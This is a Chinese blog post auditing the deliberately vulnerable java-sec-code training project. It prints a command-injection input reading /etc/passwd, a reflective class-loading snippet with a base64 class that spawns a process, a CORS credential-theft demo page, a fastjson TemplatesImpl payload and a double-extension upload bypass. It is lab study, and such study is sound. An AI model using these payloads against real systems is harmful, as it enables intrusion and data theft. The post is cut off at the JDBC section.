<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans+TC&family=Roboto&display=swap/css2?family=Roboto:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"askqiu.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.23.2","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="java-sec-code项目是专门为java代码安全开发设计的，特别适合新手快速理解上手java代码中的漏洞形式。由于漏洞种类很多，这里我分为几部分去写。">
<meta property="og:type" content="article">
<meta property="og:title" content="java-sec-code之入门审计（一）">
<meta property="og:url" content="https://askqiu.github.io/2025/07/25/java-sec-code%E4%B9%8B%E5%85%A5%E9%97%A8%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/index.html">
<meta property="og:site_name" content="feverwizard&#39;s blog">
<meta property="og:description" content="java-sec-code项目是专门为java代码安全开发设计的，特别适合新手快速理解上手java代码中的漏洞形式。由于漏洞种类很多，这里我分为几部分去写。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://askqiu.github.io/images/1.png">
<meta property="og:image" content="https://askqiu.github.io/images/2.png">
<meta property="og:image" content="https://askqiu.github.io/images/3.png">
<meta property="og:image" content="https://askqiu.github.io/images/4.png">
<meta property="og:image" content="https://askqiu.github.io/images/5.png">
<meta property="og:image" content="https://askqiu.github.io/images/6.png">
<meta property="og:image" content="https://askqiu.github.io/images/7.png">
<meta property="og:image" content="https://askqiu.github.io/images/8.png">
<meta property="article:published_time" content="2025-07-25T07:46:49.000Z">
<meta property="article:modified_time" content="2025-07-25T08:05:33.841Z">
<meta property="article:author" content="feverwizard">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://askqiu.github.io/images/1.png">


<link rel="canonical" href="https://askqiu.github.io/2025/07/25/java-sec-code%E4%B9%8B%E5%85%A5%E9%97%A8%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://askqiu.github.io/2025/07/25/java-sec-code%E4%B9%8B%E5%85%A5%E9%97%A8%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/","path":"2025/07/25/java-sec-code之入门审计（一）/","title":"java-sec-code之入门审计（一）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>java-sec-code之入门审计（一） | feverwizard's blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/6.1.3/pangu.umd.js" integrity="sha256-erngBMP3zzoIM6eqQ8dmrReh2vqCRgWmORroIfVoDlE=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">feverwizard's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.</span> <span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">命令注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%B1%BB%E5%8A%A0%E8%BD%BD%EF%BC%88ClassDataLoader%EF%BC%89"><span class="nav-number">3.</span> <span class="nav-text">类加载（ClassDataLoader）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cors"><span class="nav-number">4.</span> <span class="nav-text">cors</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#crlf"><span class="nav-number">5.</span> <span class="nav-text">crlf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fastjson"><span class="nav-number">6.</span> <span class="nav-text">fastjson</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">7.</span> <span class="nav-text">文件上传</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JDBC"><span class="nav-number">8.</span> <span class="nav-text">JDBC</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="feverwizard"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">feverwizard</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://askqiu.github.io/2025/07/25/java-sec-code%E4%B9%8B%E5%85%A5%E9%97%A8%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="feverwizard">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="feverwizard's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="java-sec-code之入门审计（一） | feverwizard's blog">
      <meta itemprop="description" content="java-sec-code项目是专门为java代码安全开发设计的，特别适合新手快速理解上手java代码中的漏洞形式。由于漏洞种类很多，这里我分为几部分去写。">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          java-sec-code之入门审计（一）
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-07-25 15:46:49 / 修改时间：16:05:33" itemprop="dateCreated datePublished" datetime="2025-07-25T15:46:49+08:00">2025-07-25</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>7 分钟</span>
    </span>
</div>

            <div class="post-description">java-sec-code项目是专门为java代码安全开发设计的，特别适合新手快速理解上手java代码中的漏洞形式。由于漏洞种类很多，这里我分为几部分去写。</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>​	java-sec-code项目是专门为java代码安全开发设计的，特别适合新手快速理解上手java代码中的漏洞形式。由于漏洞种类很多，这里我分为几部分去写。</p>
<p>​	环境搭建——jdk8u65–docker-compose up—idea启动</p>
<h2 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h2><p>不安全情况</p>
<p>​	访问对应的路由，传入参数，并且idea开启调试</p>
<p><img src="/images/1.png"></p>
<p>可以看到获取的filepath参数直接传入ProcessBuilder</p>
<p>​	ProcessBuilder构造函数接受String字符串新建进程，执行对应命令，这里新建sh进程，执行了ls和ping命令。不过需要注意的是，new的时候不会直接创建进程，而是要等到Process process &#x3D; builder.start();才会创建对应传入字符串的进程。</p>
<p><img src="/images/2.png" alt="image-20250720221247244"></p>
<p>安全情况</p>
<p>​	访问&#x2F;codeinject&#x2F;sec?filepath&#x3D;&#x2F;tmp;cat%20&#x2F;etc&#x2F;passwd，打断点。可以看到这里有一个filter，我们进去看看怎么实现的</p>
<p><img src="/images/3.png" alt="image-20250720223425787"></p>
<p>​	ctrl左键键点击cmdFilter，可以看到有个if判断，if没匹配上，则返回null，否则返回input，也就是我们最初传入的filepath</p>
<p><img src="/images/4.png" alt="image-20250720224717162"></p>
<p>​	这里顺便说一下FILTER_PATTERN是正则表达式的模板对象，是Pattern类型，Pattern类用于表示编译后的正则表达式</p>
<p>​	我们左键跟进FILTER_PATTERN，可以看到他如何生成的模板对象(通过Pattern的.compile方法)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">Pattern</span> <span class="variable">FILTER_PATTERN</span> <span class="operator">=</span> Pattern.compile(<span class="string">&quot;^[a-zA-Z0-9_/\\.-]+$&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>​	这里我们可以看到正则表达式匹配的内容，也就是说我们传入的;和空格是非法的，所以会return “Bad boy. I got u.”;</p>
<p>​	可以验证一下，我们把非法的删掉，再传入。这里没有被抓到，只是说目录不存在，验证猜想。可以想想是否有办法绕过呢？</p>
<p><img src="/images/5.png" alt="image-20250720225316420"></p>
<h2 id="类加载（ClassDataLoader）"><a href="#类加载（ClassDataLoader）" class="headerlink" title="类加载（ClassDataLoader）"></a>类加载（ClassDataLoader）</h2><p>这里我们另起炉灶。先写一个静态代码块里弹计算器的类，然后javac编译成.class，再base64编码，赋值给classData，成功弹计算器，涉及反射内容。在调用 defineClass 后，类只是被加载，还未初始化。直到调用 getDeclaredConstructor().newInstance() 或其他方式实例化类，才会触发静态代码块。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">classData</span> <span class="operator">=</span> <span class="string">&quot;yv66vgAAADQAIQoACAASCgATABQIABUKABMAFgcAFwoABQAYBwAZBwAaAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACDxjbGluaXQ+AQANU3RhY2tNYXBUYWJsZQcAFwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACQAKBwAbDAAcAB0BABJvcGVuIC1hIENhbGN1bGF0b3IMAB4AHwEAE2phdmEvbGFuZy9FeGNlcHRpb24MACAACgEADG9yZy90ZXN0L0V4cAEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABwAIAAAAAAACAAEACQAKAAEACwAAAB0AAQABAAAABSq3AAGxAAAAAQAMAAAABgABAAAAAwAIAA0ACgABAAsAAABPAAIAAQAAABK4AAISA7YABFenAAhLKrYABrEAAQAAAAkADAAFAAIADAAAABYABQAAAAgACQALAAwACQANAAoAEQAMAA4AAAAHAAJMBwAPBAABABAAAAACABE=&quot;</span>;</span><br><span class="line">            <span class="type">byte</span>[] classBytes = java.util.Base64.getDecoder().decode(classData);</span><br><span class="line">            java.lang.reflect.<span class="type">Method</span> <span class="variable">defineClassMethod</span> <span class="operator">=</span> ClassLoader.class.getDeclaredMethod(</span><br><span class="line">                    <span class="string">&quot;defineClass&quot;</span>, String.class, <span class="type">byte</span>[].class, <span class="type">int</span>.class, <span class="type">int</span>.class);</span><br><span class="line">            defineClassMethod.setAccessible(<span class="literal">true</span>);</span><br><span class="line">            Class&lt;?&gt; cc = (Class&lt;?&gt;) defineClassMethod.invoke(</span><br><span class="line">                    ClassLoader.getSystemClassLoader(), <span class="literal">null</span>, classBytes, <span class="number">0</span>, classBytes.length);</span><br><span class="line">          <span class="comment">//===============================</span></span><br><span class="line">            cc.getDeclaredConstructor().newInstance(); <span class="comment">// 替代 deprecated 的 newInstance()</span></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="cors"><a href="#cors" class="headerlink" title="cors"></a>cors</h2><p>我们看对应代码，获取origin请求头并且设置为自己的响应头。这样，我们就可以起一个网页，让受害者访问我们的网页后发起一个跨域请求，在进行跨域请求的时候带上目标网站的cookie，从而获取到该受害者对应账号、对应功能点的数据。</p>
<p>这里有个小知识，fetch&#x2F;xhr&#x2F;form表单进行跨域请求的时候会自动带上origin头</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RequestMapping(&quot;/cors&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Cors</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="type">String</span> <span class="variable">info</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;name\&quot;: \&quot;JoyChou\&quot;, \&quot;phone\&quot;: \&quot;18200001111\&quot;&#125;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;/vuln/origin&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">vuls1</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">origin</span> <span class="operator">=</span> request.getHeader(<span class="string">&quot;origin&quot;</span>);</span><br><span class="line">        response.setHeader(<span class="string">&quot;Access-Control-Allow-Origin&quot;</span>, origin); <span class="comment">// set origin from header</span></span><br><span class="line">        response.setHeader(<span class="string">&quot;Access-Control-Allow-Credentials&quot;</span>, <span class="string">&quot;true&quot;</span>);  <span class="comment">// allow cookie</span></span><br><span class="line">        <span class="keyword">return</span> info;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>我们py起一个网页，网页代码如下，发起跨域请求，看是否能够获取数据</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>跨域信息窃取演示<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">h1</span>&gt;</span>正在尝试窃取信息...<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">fetch</span>(<span class="string">&quot;http://localhost:8081/cors/vuln/origin&quot;</span>, &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="attr">credentials</span>: <span class="string">&quot;include&quot;</span> <span class="comment">// 携带用户的 cookie</span></span></span><br><span class="line"><span class="language-javascript">    &#125;)</span></span><br><span class="line"><span class="language-javascript">    .<span class="title function_">then</span>(<span class="function"><span class="params">response</span> =&gt;</span> response.<span class="title function_">text</span>())</span></span><br><span class="line"><span class="language-javascript">    .<span class="title function_">then</span>(<span class="function"><span class="params">data</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;✅ 窃取成功，内容如下：&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">console</span>.<span class="title function_">log</span>(data); <span class="comment">// 🚨 打印窃取的敏感信息到控制台</span></span></span><br><span class="line"><span class="language-javascript">    &#125;)</span></span><br><span class="line"><span class="language-javascript">    .<span class="title function_">catch</span>(<span class="function"><span class="params">err</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">console</span>.<span class="title function_">error</span>(<span class="string">&quot;❌ 窃取失败：&quot;</span>, err);</span></span><br><span class="line"><span class="language-javascript">    &#125;);</span></span><br><span class="line"><span class="language-javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>成功，如图，可以看到发起了两次请求，并且访问origin端点的时候成功获取信息</p>
<p><img src="/images/6.png" alt="image-20250722153721783"></p>
<p>修复方案：白名单、加csrf token。具体代码可以参考项目中。</p>
<h2 id="crlf"><a href="#crlf" class="headerlink" title="crlf"></a>crlf</h2><p>jdk8会对头进行过滤\r\n，不会存在这个漏洞</p>
<h2 id="fastjson"><a href="#fastjson" class="headerlink" title="fastjson"></a>fastjson</h2><p>这里不深入分析。找到fastjson的代码，我们可以看见是直接接收整个请求体，注意是ct是json</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="meta">@RequestMapping(&quot;/fastjson&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Fastjson</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(value = &quot;/deserialize&quot;, method = &#123;RequestMethod.POST&#125;)</span></span><br><span class="line">    <span class="meta">@ResponseBody</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">Deserialize</span><span class="params">(<span class="meta">@RequestBody</span> String params)</span> &#123;</span><br><span class="line">        <span class="comment">// 如果Content-Type不设置application/json格式，post数据会被url编码</span></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 将post提交的string转换为json</span></span><br><span class="line">            <span class="type">JSONObject</span> <span class="variable">ob</span> <span class="operator">=</span> JSON.parseObject(params,Feature.SupportNonPublicField);</span><br><span class="line">            <span class="keyword">return</span> ob.get(<span class="string">&quot;name&quot;</span>).toString();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">return</span> e.toString();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>请求体，这里我们根据代码下面提示直接TemplatesImpl。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;@type&quot;: &quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;,</span><br><span class="line">  &quot;_bytecodes&quot;: [&quot;这里是base64编码的gadget&quot;],</span><br><span class="line">  &quot;_name&quot;: &quot;lightless&quot;,</span><br><span class="line">  &quot;_tfactory&quot;: &#123;&#125;,</span><br><span class="line">  &quot;_outputProperties&quot;: &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><p>这里有两个接口，一个是任意文件上传的接口，一个是让上传图片的接口。任意文件上传就不说了，可以看看上传image的代码。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@PostMapping(&quot;/upload/picture&quot;)</span></span><br><span class="line">   <span class="meta">@ResponseBody</span></span><br><span class="line">   <span class="keyword">public</span> String <span class="title function_">uploadPicture</span><span class="params">(<span class="meta">@RequestParam(&quot;file&quot;)</span> MultipartFile multifile)</span> </span><br></pre></td></tr></table></figure>

<p>可以看到代码里面用到了几个方法，都是当前类的方法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">convert	//生成随机文件名的文件</span><br><span class="line">isImag  //判断是否是图片 BufferedImage bi = ImageIO.read(file);</span><br></pre></td></tr></table></figure>

<p>在uploadPicture方法中，设置了文件后缀名白名单，MIME黑名单。观察下面代码，这种获取文件后缀名的方式可以通过双后缀名绕过，比如说.jsp;.png，并且结合一些解析漏洞或者tomcat自己本身的特性导致最终落地文件为非png。（nginx只根据最后一个后缀判断MIME，tomcat则把；后的识别为参数列表）</p>
<p><img src="/images/7.png" alt="image-20250724110727137"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">String Suffix = fileName.substring(fileName.lastIndexOf(&quot;.&quot;)); // 获取文件后缀名</span><br><span class="line">...</span><br><span class="line">if (Suffix.toLowerCase().equals(white_suffix))</span><br></pre></td></tr></table></figure>

<p>顺便说一下，文件解析的时候分为几种情况。浏览器解析文件的时候根据Content-Type，web服务器文件落地是根据文件后缀名解析，Java后端处理文件则是根据文件内容（magic number），此时ct和后缀名都可以忽略。</p>
<p>通过通读代码，我们还可以发现，生成uuid文件名，只用于检验文件内容就消除了，最终落地的文件名没有用到convert。</p>
<h2 id="JDBC"><a href="#JDBC" class="headerlink" title="JDBC"></a>JDBC</h2><p>兴致来了，简单调试一下，参考文章<a target="_blank" rel="noopener" href="https://tttang.com/archive/1462/">https://tttang.com/archive/1462/</a></p>
<p>异常跟踪时，可能会出现行号对不上的情况，注意上下文看看。甚至会出现在另外一个方法里，我这里调试的时候就出现了这个问题。</p>
<p>Property是指在建立连接时支持的JDBC连接属性。</p>
<p>先写一个测试代码</p>
